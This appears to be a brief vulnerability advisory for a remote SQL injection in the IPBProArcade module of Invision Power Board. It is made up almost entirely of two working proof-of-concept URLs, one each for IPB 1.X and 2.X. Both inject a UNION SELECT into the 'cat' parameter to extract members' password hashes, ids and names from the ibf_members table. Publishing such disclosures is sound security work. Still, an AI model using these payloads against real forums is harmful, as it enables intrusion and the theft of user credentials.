|
|
IPBProArcade Remote SQL Injection Vulnerability
No exploit is required to leverage this issue. The following proof of concept exploits have been provided: For modules installed on Invision Power Board versions 1.X: http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/* For modules installed on Invision Power Board versions 2.X: index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/* |
|
Privacy Statement |